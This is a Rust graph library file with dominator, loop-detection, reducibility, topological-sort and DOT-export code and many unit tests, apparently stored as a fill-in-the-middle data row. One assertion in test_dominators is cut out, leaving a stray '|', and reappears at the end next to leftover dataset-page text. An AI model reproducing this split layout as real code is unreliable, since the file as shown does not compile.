let mut temporary_marks: FxHashSet<usize> = FxHashSet::default();
fn dfs_is_acyclic<V: Vertex, E: Edge>(
graph: &Graph<V, E>,
node: usize,
permanent_marks: &mut FxHashSet<usize>,
temporary_marks: &mut FxHashSet<usize>,
) -> bool {
if permanent_marks.contains(&node) {
return true;
}
if temporary_marks.contains(&node) {
return false;
}
temporary_marks.insert(node);
let successors_are_acyclic = graph.successors[&node].iter().all(|successor| {
dfs_is_acyclic(graph, *successor, permanent_marks, temporary_marks)
});
if !successors_are_acyclic {
return false;
}
temporary_marks.remove(&node);
permanent_marks.insert(node);
true
}
dfs_is_acyclic(self, root, &mut permanent_marks, &mut temporary_marks)
}
/// Computes the set of back edges
///
/// Back edges are edges whose heads dominate their tails.
fn compute_back_edges(&self, head: usize) -> Result<FxHashSet<(usize, usize)>> {
let mut back_edges: FxHashSet<(usize, usize)> = FxHashSet::default();
for (node, dominators) in self.compute_dominators(head)? {
for successor in &self.successors[&node] {
if dominators.contains(successor) {
back_edges.insert((node, *successor));
}
}
}
Ok(back_edges)
}
/// Determines if the graph is reducible.
pub fn is_reducible(&self, head: usize) -> Result<bool> {
let back_edges = self.compute_back_edges(head)?;
// Build a graph without back edges, a.k.a. forward edges (FE) graph.
let mut fe_graph = Graph::new();
for index in self.vertices.keys() {
fe_graph.insert_vertex(NullVertex::new(*index))?;
}
for edge in self.edges.keys() {
if !back_edges.contains(edge) {
fe_graph.insert_edge(NullEdge::new(edge.0, edge.1))?;
}
}
// Graph is reducible iff the FE graph is acyclic and every node is reachable from head.
let every_node_is_reachable = fe_graph.unreachable_vertices(head)?.is_empty();
Ok(every_node_is_reachable && fe_graph.is_acyclic(head))
}
/// Computes the set of natural loops in the graph
pub fn compute_loops(&self, head: usize) -> Result<Vec<Loop>> {
let mut loops: BTreeMap<usize, BTreeSet<usize>> = BTreeMap::new();
// For each back edge compute the set of nodes part of the loop
for (tail, header) in self.compute_back_edges(head)? {
let nodes = loops.entry(header).or_default();
let mut queue: Vec<usize> = Vec::new();
nodes.insert(header);
if nodes.insert(tail) {
queue.push(tail);
}
while let Some(node) = queue.pop() {
for &predecessor in &self.predecessors[&node] {
if nodes.insert(predecessor) {
queue.push(predecessor);
}
}
}
}
Ok(loops
.iter()
.map(|(&header, nodes)| Loop::new(header, nodes.clone()))
.collect())
}
/// Computes the loop tree of all natural loops in the graph
///
/// If loop `l1` is nested in loop `l2`, `l1` is a child node of `l2` in the loop tree.
pub fn compute_loop_tree(&self, head: usize) -> Result<LoopTree> {
let mut tree = LoopTree::new();
let loops = self.compute_loops(head)?;
for l in &loops {
tree.insert_vertex(l.clone())?;
}
for l1 in &loops {
for l2 in &loops {
if l1.is_nesting(l2) {
tree.insert_edge(NullEdge::new(l1.header(), l2.header()))?;
}
}
}
Ok(tree)
}
/// Computes the topological ordering of all vertices in the graph
pub fn compute_topological_ordering(&self) -> Result<Vec<usize>> {
let mut permanent_marks: FxHashSet<usize> = FxHashSet::default();
let mut temporary_marks: FxHashSet<usize> = FxHashSet::default();
let mut order: Vec<usize> = Vec::new();
fn dfs_walk<V: Vertex, E: Edge>(
graph: &Graph<V, E>,
node: usize,
permanent_marks: &mut FxHashSet<usize>,
temporary_marks: &mut FxHashSet<usize>,
order: &mut Vec<usize>,
) -> Result<()> {
if permanent_marks.contains(&node) {
return Ok(());
}
if temporary_marks.contains(&node) {
return Err("Graph contains a loop".into());
}
temporary_marks.insert(node);
for successor in &graph.successors[&node] {
dfs_walk(graph, *successor, permanent_marks, temporary_marks, order)?;
}
temporary_marks.remove(&node);
permanent_marks.insert(node);
order.push(node);
Ok(())
}
for node in self.vertices.keys() {
dfs_walk(
self,
*node,
&mut permanent_marks,
&mut temporary_marks,
&mut order,
)?;
}
Ok(order.into_iter().rev().collect())
}
/// Returns all vertices in the graph.
pub fn vertices(&self) -> Vec<&V> {
self.vertices.values().collect()
}
pub fn vertices_mut(&mut self) -> Vec<&mut V> {
let mut vec = Vec::new();
for vertex in &mut self.vertices {
vec.push(vertex.1);
}
vec
}
/// Fetches an index from the graph by index.
pub fn vertex(&self, index: usize) -> Result<&V> {
self.vertices
.get(&index)
.ok_or_else(|| ErrorKind::GraphVertexNotFound(index).into())
}
// Fetches a mutable instance of a vertex.
pub fn vertex_mut(&mut self, index: usize) -> Result<&mut V> {
self.vertices
.get_mut(&index)
.ok_or_else(|| ErrorKind::GraphVertexNotFound(index).into())
}
pub fn edge(&self, head: usize, tail: usize) -> Result<&E> {
self.edges
.get(&(head, tail))
.ok_or_else(|| ErrorKind::GraphEdgeNotFound(head, tail).into())
}
pub fn edge_mut(&mut self, head: usize, tail: usize) -> Result<&mut E> {
self.edges
.get_mut(&(head, tail))
.ok_or_else(|| ErrorKind::GraphEdgeNotFound(head, tail).into())
}
/// Get a reference to every `Edge` in the `Graph`.
pub fn edges(&self) -> Vec<&E> {
self.edges.values().collect()
}
/// Get a mutable reference to every `Edge` in the `Graph`.
pub fn edges_mut(&mut self) -> Vec<&mut E> {
let mut vec = Vec::new();
for edge in &mut self.edges {
vec.push(edge.1);
}
vec
}
/// Return all edges out for a vertex
pub fn edges_out(&self, index: usize) -> Result<Vec<&E>> {
self.successors
.get(&index)
.map(|succs| {
succs
.iter()
.map(|succ| &self.edges[&(index, *succ)])
.collect()
})
.ok_or_else(|| ErrorKind::GraphVertexNotFound(index).into())
}
/// Return all edges in for a vertex
pub fn edges_in(&self, index: usize) -> Result<Vec<&E>> {
self.predecessors
.get(&index)
.map(|preds| {
preds
.iter()
.map(|pred| &self.edges[&(*pred, index)])
.collect()
})
.ok_or_else(|| ErrorKind::GraphVertexNotFound(index).into())
}
/// Returns a string in the graphviz format
pub fn dot_graph(&self) -> String {
let vertices = self
.vertices
.iter()
.map(|v| {
let label = v.1.dot_label().replace("\n", "\\l");
let fill_color = v.1.dot_fill_color();
let font_color = v.1.dot_font_color();
format!(
"{} [shape=\"box\", label=\"{}\", style=\"filled\", fillcolor=\"{}\", fontcolor=\"{}\"];",
v.1.index(),
label,
fill_color,
font_color,
)
})
.collect::<Vec<String>>();
let edges = self
.edges
.iter()
.map(|e| {
let label = e.1.dot_label().replace("\n", "\\l");
let style = e.1.dot_style();
let fill_color = e.1.dot_fill_color();
let font_color = e.1.dot_font_color();
let pen_width = e.1.dot_pen_width();
format!("{} -> {} [label=\"{}\", style=\"{}\", color=\"{}\", fontcolor=\"{}\", penwidth=\"{}\"];",
e.1.head(), e.1.tail(), label, style, fill_color, font_color, pen_width)
})
.collect::<Vec<String>>();
let options = vec![
"graph [fontname = \"Courier New\", splines=\"polyline\"]",
"node [fontname = \"Courier New\"]",
"edge [fontname = \"Courier New\"]",
];
format!(
"digraph G {{\n{}\n\n{}\n{}\n}}",
options.join("\n"),
vertices.join("\n"),
edges.join("\n")
)
}
}
#[cfg(test)]
mod tests {
use super::*;
impl Vertex for usize {
fn index(&self) -> usize {
*self
}
fn dot_label(&self) -> String {
self.to_string()
}
}
impl Edge for (usize, usize) {
fn head(&self) -> usize {
self.0
}
fn tail(&self) -> usize {
self.1
}
fn dot_label(&self) -> String {
format!("{} -> {}", self.0, self.1)
}
}
/**
* +--> 3 +-+
* / \
* | +--> 4 +--+
* |/ |
* + v
* 1 +---> 2 <-------+ 5
* +
* |
* v
* 6
*
* From: https://en.wikipedia.org/wiki/Dominator_(graph_theory)
*/
fn create_test_graph() -> Graph<usize, (usize, usize)> {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_vertex(5).unwrap();
graph.insert_vertex(6).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((2, 4)).unwrap();
graph.insert_edge((2, 6)).unwrap();
graph.insert_edge((3, 5)).unwrap();
graph.insert_edge((4, 5)).unwrap();
graph.insert_edge((5, 2)).unwrap();
graph
}
#[test]
fn test_successors() {
let graph = create_test_graph();
assert_eq!(graph.successors(2).unwrap(), vec![&3, &4, &6]);
let empty_vertex_list: Vec<&usize> = vec![];
assert_eq!(graph.successors(6).unwrap(), empty_vertex_list);
// vertex 7 does not exist
assert!(graph.successors(7).is_err());
}
#[test]
fn test_predecessors() {
let graph = create_test_graph();
let empty_vertex_list: Vec<&usize> = vec![];
assert_eq!(graph.predecessors(1).unwrap(), empty_vertex_list);
assert_eq!(graph.predecessors(2).unwrap(), vec![&1, &5]);
// vertex 7 does not exist
assert!(graph.successors(7).is_err());
}
#[test]
fn test_pre_order() {
let graph = create_test_graph();
assert_eq!(graph.compute_pre_order(1).unwrap(), vec![1, 2, 6, 4, 5, 3]);
assert_eq!(graph.compute_pre_order(5).unwrap(), vec![5, 2, 6, 4, 3]);
}
#[test]
fn test_post_order() {
let graph = create_test_graph();
assert_eq!(graph.compute_post_order(1).unwrap(), vec![5, 3, 4, 6, 2, 1]);
assert_eq!(graph.compute_post_order(5).unwrap(), vec![3, 4, 6, 2, 5]);
}
#[test]
fn test_dominance_frontiers() {
let graph = create_test_graph();
let dominance_frontiers = graph.compute_dominance_frontiers(1).unwrap();
assert_eq!(
dominance_frontiers.get(&1).unwrap(),
&vec![].into_iter().collect()
);
assert_eq!(
dominance_frontiers.get(&2).unwrap(),
&vec![2].into_iter().collect()
);
assert_eq!(
dominance_frontiers.get(&3).unwrap(),
&vec![5].into_iter().collect()
);
assert_eq!(
dominance_frontiers.get(&4).unwrap(),
&vec![5].into_iter().collect()
);
assert_eq!(
dominance_frontiers.get(&5).unwrap(),
&vec![2].into_iter().collect()
);
assert_eq!(
dominance_frontiers.get(&6).unwrap(),
&vec![].into_iter().collect()
);
}
#[test]
fn test_dominance_frontiers_of_graph_with_start_node_in_loop() {
// +-------+
// | |
// v +
// ---> 1 +---> 2 +---> 3
// + /\
// | |
// +---------------+
//
// Simplified version of the example given in
// https://www.seas.harvard.edu/courses/cs252/2011sp/slides/Lec04-SSA.pdf
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((1, 3)).unwrap();
graph.insert_edge((2, 1)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph
};
let dominance_frontiers = graph.compute_dominance_frontiers(1).unwrap();
assert_eq!(
dominance_frontiers.get(&1).unwrap(),
&vec![1].into_iter().collect()
);
assert_eq!(
dominance_frontiers.get(&2).unwrap(),
&vec![1, 3].into_iter().collect()
);
assert_eq!(
dominance_frontiers.get(&3).unwrap(),
&vec![].into_iter().collect()
);
}
#[test]
fn test_immediate_dominators_graph1() {
let graph = create_test_graph();
let idoms = graph.compute_immediate_dominators(1).unwrap();
assert!(idoms.get(&1).is_none());
assert_eq!(*idoms.get(&2).unwrap(), 1);
assert_eq!(*idoms.get(&3).unwrap(), 2);
assert_eq!(*idoms.get(&4).unwrap(), 2);
assert_eq!(*idoms.get(&5).unwrap(), 2);
assert_eq!(*idoms.get(&6).unwrap(), 2);
}
#[test]
fn test_immediate_dominators_graph2() {
// |
// v
// +--> 0
// | |
// | +--+--+
// | | |
// | v v
// | 1 2 +-+
// | | | |
// | +--+--+ |
// | | |
// | v |
// +--+ 3 |
// | |
// v |
// 4 <----+
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(0).unwrap();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_edge((0, 1)).unwrap();
graph.insert_edge((0, 2)).unwrap();
graph.insert_edge((1, 3)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((2, 4)).unwrap();
graph.insert_edge((3, 0)).unwrap();
graph.insert_edge((3, 4)).unwrap();
graph
};
let idoms = graph.compute_immediate_dominators(0).unwrap();
assert!(idoms.get(&0).is_none());
assert_eq!(*idoms.get(&1).unwrap(), 0);
assert_eq!(*idoms.get(&2).unwrap(), 0);
assert_eq!(*idoms.get(&3).unwrap(), 0);
assert_eq!(*idoms.get(&4).unwrap(), 0);
}
#[test]
fn test_dominators() {
let graph = create_test_graph();
let dominators = graph.compute_dominators(1).unwrap();
|
assert_eq!(
dominators.get(&2).unwrap(),
&vec![1, 2].into_iter().collect()
);
assert_eq!(
dominators.get(&3).unwrap(),
&vec![1, 2, 3].into_iter().collect()
);
assert_eq!(
dominators.get(&4).unwrap(),
&vec![1, 2, 4].into_iter().collect()
);
assert_eq!(
dominators.get(&5).unwrap(),
&vec![1, 2, 5].into_iter().collect()
);
assert_eq!(
dominators.get(&6).unwrap(),
&vec![1, 2, 6].into_iter().collect()
);
}
#[test]
fn test_dominator_tree() {
let graph = create_test_graph();
let dominator_tree = graph.compute_dominator_tree(1).unwrap();
// Expected:
// 1 +---> 2 +---> 3
// |
// +---> 4
// |
// +---> 5
// |
// +---> 6
assert_eq!(dominator_tree.edges().len(), 5);
assert!(dominator_tree.edge(1, 2).is_ok());
assert!(dominator_tree.edge(2, 3).is_ok());
assert!(dominator_tree.edge(2, 4).is_ok());
assert!(dominator_tree.edge(2, 5).is_ok());
assert!(dominator_tree.edge(2, 6).is_ok());
}
#[test]
fn test_all_predecessors() {
let graph = create_test_graph();
let predecessors = graph.compute_predecessors().unwrap();
assert_eq!(predecessors.get(&1).unwrap(), &vec![].into_iter().collect());
assert_eq!(
predecessors.get(&2).unwrap(),
&vec![1, 2, 3, 4, 5].into_iter().collect()
);
}
#[test]
fn test_topological_ordering_should_return_error_for_cyclic_graph() {
let graph = create_test_graph();
assert!(graph.compute_topological_ordering().is_err());
}
#[test]
fn test_topological_ordering() {
// ---> 1 +---> 2 +-+-> 3 +---> 4
// + / \ /\
// | / \ |
// +-----> 5 +---> 6 +-+-> 7
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_vertex(5).unwrap();
graph.insert_vertex(6).unwrap();
graph.insert_vertex(7).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((2, 5)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((3, 4)).unwrap();
graph.insert_edge((3, 7)).unwrap();
graph.insert_edge((5, 3)).unwrap();
graph.insert_edge((5, 6)).unwrap();
graph.insert_edge((6, 7)).unwrap();
graph.insert_edge((7, 4)).unwrap();
graph
};
assert_eq!(
graph.compute_topological_ordering().unwrap(),
vec![1, 2, 5, 6, 3, 7, 4]
);
}
#[test]
fn test_vertices_without_predecessors() {
let graph = create_test_graph();
let vertices = graph.vertices_without_predecessors();
assert_eq!(vertices, [graph.vertex(1).unwrap()]);
}
#[test]
fn test_vertices_without_successors() {
let graph = create_test_graph();
let vertices = graph.vertices_without_successors();
assert_eq!(vertices, [graph.vertex(6).unwrap()]);
}
#[test]
fn test_remove_unreachable_vertices() {
let mut graph = Graph::new();
// reachable
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_edge((1, 2)).unwrap();
// unreachable
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_vertex(5).unwrap();
graph.insert_edge((4, 5)).unwrap();
graph.insert_edge((4, 2)).unwrap();
graph.remove_unreachable_vertices(1).unwrap();
assert_eq!(graph.num_vertices(), 2);
assert!(graph.has_vertex(1));
assert!(graph.has_vertex(2));
}
#[test]
fn test_reachable_vertices() {
let mut graph = Graph::new();
// reachable from 1
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_edge((1, 2)).unwrap();
// unreachable from 1
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_vertex(5).unwrap();
graph.insert_edge((4, 5)).unwrap();
graph.insert_edge((4, 2)).unwrap();
let reachable_vertices = graph.reachable_vertices(1).unwrap();
assert_eq!(reachable_vertices.len(), 2);
assert!(reachable_vertices.contains(&1));
assert!(reachable_vertices.contains(&2));
}
#[test]
fn test_unreachable_vertices() {
let mut graph = Graph::new();
// reachable from 1
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_edge((1, 2)).unwrap();
// unreachable from 1
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_vertex(5).unwrap();
graph.insert_edge((4, 5)).unwrap();
graph.insert_edge((4, 2)).unwrap();
let unreachable_vertices = graph.unreachable_vertices(1).unwrap();
assert_eq!(unreachable_vertices.len(), 3);
assert!(unreachable_vertices.contains(&3));
assert!(unreachable_vertices.contains(&4));
assert!(unreachable_vertices.contains(&5));
}
#[test]
fn test_is_acyclic_should_return_false_for_cyclic_graph() {
let graph = create_test_graph();
assert_eq!(graph.is_acyclic(1), false);
}
#[test]
fn test_is_acyclic_should_return_true_for_acyclic_graph() {
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((1, 3)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph
};
assert!(graph.is_acyclic(1));
}
#[test]
fn test_is_reducible_should_return_false_for_irreducible_graph() {
// Loop 2-3 with two loop entries 2 & 3 -> irreducible
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((1, 3)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((3, 2)).unwrap();
graph
};
assert_eq!(graph.is_reducible(1).unwrap(), false);
}
#[test]
fn test_is_reducible_should_return_true_for_reducible_graph() {
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap(); // loop header
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((2, 4)).unwrap();
graph.insert_edge((3, 1)).unwrap(); // back edge
graph
};
assert!(graph.is_reducible(1).unwrap());
}
#[test]
fn test_compute_loops_single_loop() {
let graph = create_test_graph();
let loops = graph.compute_loops(1).unwrap();
assert_eq!(loops.len(), 1);
assert_eq!(loops[0].header(), 2);
assert_eq!(loops[0].nodes(), &vec![2, 3, 4, 5].into_iter().collect());
}
#[test]
fn test_compute_loops_nested_loops() {
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_vertex(5).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((3, 4)).unwrap();
graph.insert_edge((3, 2)).unwrap(); // back edge
graph.insert_edge((4, 5)).unwrap();
graph.insert_edge((4, 1)).unwrap(); // back edge
graph
};
let loops = graph.compute_loops(1).unwrap();
assert_eq!(loops.len(), 2);
assert!(loops.contains(&Loop::new(1, vec![1, 2, 3, 4].into_iter().collect())));
assert!(loops.contains(&Loop::new(2, vec![2, 3].into_iter().collect())));
}
#[test]
fn test_compute_loops_disjoint_loops() {
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_vertex(5).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((2, 1)).unwrap(); // back edge
graph.insert_edge((3, 4)).unwrap();
graph.insert_edge((4, 5)).unwrap();
graph.insert_edge((4, 3)).unwrap(); // back edge
graph
};
let loops = graph.compute_loops(1).unwrap();
assert_eq!(loops.len(), 2);
assert!(loops.contains(&Loop::new(1, vec![1, 2].into_iter().collect())));
assert!(loops.contains(&Loop::new(3, vec![3, 4].into_iter().collect())));
}
#[test]
fn test_compute_loops_self_loop() {
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((2, 2)).unwrap(); // back edge
graph
};
let loops = graph.compute_loops(1).unwrap();
assert_eq!(loops.len(), 1);
assert_eq!(loops[0].header(), 2);
assert_eq!(loops[0].nodes(), &vec![2].into_iter().collect());
}
#[test]
fn test_compute_loops_should_combine_loops_with_same_header() {
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((1, 3)).unwrap();
graph.insert_edge((2, 1)).unwrap(); // back edge
graph.insert_edge((3, 1)).unwrap(); // back edge
graph
};
let loops = graph.compute_loops(1).unwrap();
assert_eq!(loops.len(), 1);
assert_eq!(loops[0].header(), 1);
assert_eq!(loops[0].nodes(), &vec![1, 2, 3].into_iter().collect());
}
#[test]
fn test_compute_dfs_tree() {
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_vertex(5).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((1, 3)).unwrap();
graph.insert_edge((1, 4)).unwrap();
graph.insert_edge((2, 5)).unwrap();
graph.insert_edge((3, 2)).unwrap();
graph
};
let expected_tree = {
let mut tree = Graph::new();
// visit 1 -> stack [(1,2), (1,3), (1,4)]
tree.insert_vertex(NullVertex::new(1)).unwrap();
// visit 4 -> stack [(1,2), (1,3)]
tree.insert_vertex(NullVertex::new(4)).unwrap();
tree.insert_edge(NullEdge::new(1, 4)).unwrap();
// visit 3 -> stack [(1,2), (3,2)]
tree.insert_vertex(NullVertex::new(3)).unwrap();
tree.insert_edge(NullEdge::new(1, 3)).unwrap();
// visit 2 -> stack [(1,2), (2,5)]
tree.insert_vertex(NullVertex::new(2)).unwrap();
tree.insert_edge(NullEdge::new(3, 2)).unwrap();
// visit 5 -> stack [(1,2)]
tree.insert_vertex(NullVertex::new(5)).unwrap();
tree.insert_edge(NullEdge::new(2, 5)).unwrap();
// skip 2 -> stack []
tree
};
assert_eq!(expected_tree, graph.compute_dfs_tree(1).unwrap());
}
#[test]
fn test_compute_loop_tree() {
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((2, 2)).unwrap(); // self loop
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((3, 1)).unwrap(); // back edge to 1
graph.insert_edge((3, 4)).unwrap();
graph.insert_edge((4, 4)).unwrap(); // self loop
graph
};
let expected_loop_tree = {
let mut tree = LoopTree::new();
tree.insert_vertex(Loop::new(1, vec![1, 2, 3].into_iter().collect()))
.unwrap();
tree.insert_vertex(Loop::new(2, vec![2].into_iter().collect()))
.unwrap();
tree.insert_vertex(Loop::new(4, vec![4].into_iter().collect()))
.unwrap();
tree.insert_edge(NullEdge::new(1, 2)).unwrap(); // loop 2 is nested in loop 1
tree
};
let loop_tree = graph.compute_loop_tree(1).unwrap();
assert_eq!(expected_loop_tree, loop_tree);
}
#[test]
fn test_remove_vertex() {
// GIVEN
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_edge((1, 2)).unwrap(); // ingoing
graph.insert_edge((2, 3)).unwrap(); // outgoing
graph.insert_edge((1, 3)).unwrap();
// WHEN
graph.remove_vertex(2).unwrap();
// THEN should have removed vertex 2 and ingoing/outgoing edges
assert_eq!(vec![&1, &3], graph.vertices());
assert_eq!(vec![&(1, 3)], graph.edges());
}
#[test]
fn test_remove_vertex_with_self_loop() {
// GIVEN
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_edge((1, 1)).unwrap(); // self loop
// WHEN
graph.remove_vertex(1).unwrap();
// THEN should have removed vertex 1 and self loop
assert!(graph.vertices().is_empty());
assert!(graph.edges().is_empty());
}
} | assert_eq!(dominators.get(&1).unwrap(), &vec![1].into_iter().collect()); |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.